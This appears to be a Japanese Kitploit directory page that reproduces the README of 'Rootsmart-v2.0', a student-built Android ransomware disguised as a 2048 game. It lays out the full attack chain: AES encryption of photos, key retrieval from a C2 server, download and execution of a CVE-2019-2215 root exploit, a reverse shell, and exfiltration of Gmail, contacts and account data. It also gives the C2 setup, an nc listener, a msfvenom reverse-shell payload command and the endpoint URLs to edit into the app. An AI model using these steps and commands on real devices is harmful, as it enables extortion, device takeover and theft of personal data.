Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Rootsmart-v2.0 — Androidランサムウェア開発 - AES256暗号化 + CVE-2019-2215(リバースルートシェル) + データ窃取 | Kitploit
ツール/GitHubGitHub/nicchongwb/rootsmart-v2.0
Androidセキュリティ特権昇格暗号化/復号化ツールエクスプロイト横移動データ流出マルウェア分析モバイルセキュリティコマンド&コントロール学習と教育ペイロード開発Archived
114年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
nicchongwb/rootsmart-v2.0

Rootsmart-v2.0

Androidランサムウェア開発 - AES256暗号化 + CVE-2019-2215(リバースルートシェル) + データ窃取

リポジトリを見る

Rootsmart 2.0 w/ cve-2019-2215 + ランサムウェア

免責事項

このプロジェクトは教育目的のみです。このプロジェクトは、rkshrksh/2048-Game と kangtastic/cve-2019-2215 のコードを利用しています。


プロジェクト説明

このプロジェクトは、Singapore Institute of Technology(シンガポール工科大学)のモバイルセキュリティモジュールの一部です。プロジェクトは6週間以内で行われ、悪意のあるAndroidアプリケーションを開発することを目的としていました。これにより、Android OSにセキュリティメカニズムがどのように実装されているか、またOWASP Mobile Top 10:2017 M8 - Code Tampering(コード改ざん)をどのように実行できるかを学ぶことができました。

このプロジェクトは、AES暗号化を利用し、cve-2019-2215を悪用し、感染したデバイスからデータを外部送信する、独自に作成したランサムウェアを紹介する概念実証(PoC)です。

Android 10およびGoogle Pixel 2 XLでテストされています。

root@kitploit:~
├── 2048-Game 					// Android Project Folder
├── 2048-keystore				// Test-Keystore
├── cve-2019-2215				// Modified cve-2019-2215
│	└── cve-2019-2215.c
├── dropper_server				// Dropper server directory 
│	├── cve-2019-2215			// shells.zip content before zipping
│	├── dropper_server.py		// Dropper server program
│	├── exfiltrated_data.log
│	├── masterkeys.txt
│	├── ncat.exe 				// Netcat windows binary - for Reverse shell listener
│	├── requirements.txt
│	├── shells.zip  			// shells.zip that is hosted in root of dropper server
│	└── venv
└── test_images    				// test_images for easy adb push <image.ext> /sdcard/Pictures
攻撃ベクター:
  1. アプリケーションをインストール、実行し、権限を付与します。
  2. ランサムウェアは /sdcard/Pictures 内のすべてのファイルを AES 暗号化します。
  3. 各ファイルはランダム生成された鍵で暗号化されます。
  4. 鍵は /sdcard/keys.json に保存されます。各 key:value ペアは filepath:key です。
  5. C2 サーバーの /get_mk に HTTP GET リクエストを送信し、レスポンスボディから MasterKey と VictimID を取得します。
  6. MasterKey は keys.json を暗号化し、VictimID は /sdcard/victimID.txt に保存されます。
  7. アプリケーションは shells.zip をダウンロードし、内容を解凍します。
  8. 解凍した内容から cve-2019-2215 バイナリを実行します。
  9. ルートシェルプロセスが起動され、解凍した内容から install.sh を実行します。
  10. install.sh は解凍した内容から rs.elf を実行し、攻撃サーバーにリバース接続を送信します。
  11. アプリケーションはデバイスの Gmail、ユーザーアカウント情報、連絡先を外部送信します。
デモンストレーション

https://user-images.githubusercontent.com/56181271/155875246-092a3954-2f42-42b7-a00e-581a1bbf0546.mp4


C2(Command & Control)- セットアップ

このテストでは、被害者の端末とC2サーバーが同じサブネットワーク内にあることを確認してください(そうでない場合は、C2をパブリックインターネット上でホストしてください)。C2サーバーには、dropper/dropper_server.py にある3つのエンドポイントがあります。

  1. /process_command - GETで shells.zip をダウンロードし、cve-2019-2215 ルートエクスプロイトを実行します。
  2. /get_mk - GETで victimID:masterkey のキーと値のペアを取得し、/sdcard/keys.json を暗号化します。
  3. /postData - 外部送信されたGmail、連絡先、アカウント情報をPOSTします。
リバースシェルサーバー
root@kitploit:~
nc -lvnp 1337 # Ideally this should be the same IP as the dropper server
ドロッパーサーバー
root@kitploit:~
# Generate rs.elf payload
msfvenom -p linux/aarch64/shell_reverse_tcp LHOST=<Attacker IP> LPORT=<Attacker Port> -f elf > rs.elf

# Better to run flask on Windows if WSL don't port forward localhost traffic to Windows Host
cd dropper
python3 -m venv venv # Create venv

# Activate venv
. venv/bin/activate # Linux
venv\Scripts\activate.bat # Windows
pip install -r requirements.txt --upgrade pip # Make sure host shell is root/Administrator

# Run C2 server
python3 dropper_server.py # WSL
python dropper_server.py # Windows

shells.zip を /dropper に配置

  1. dropper/cve-2019-2215 フォルダーに移動します。
  2. rs.elf を作成した後、rs.elf と cve-2019-2215、install.sh を zip 化します。
  3. zip ファイル名を shells.zip に変更します。
  4. shells.zip を /dropper に移動します。

APK をコンパイルする前に、以下を変更してください

Java クラス

root@kitploit:~
// File : 2048-Game/app/src/main/java/aarkay/a2048game/Temproot.java
// Change IP and port according to dropper server IP and port
String URL = "http://192.168.157.73:8080/process_command"; // Line 19

// File : 2048-Game/app/src/main/java/aarkay/a2048game/Encrypt.java
// Change IP and port according to dropper server IP and port
String URL = "http://192.168.157.73:8080/get_mk"; // Line 45

// File : 2048-Game/app/src/main/java/aarkay/a2048game/PostData.java
// Change IP and port according to dropper server IP and port
String urlString = "http://192.168.157.73:8080/postData"; // Line 32
ツールをダウンロード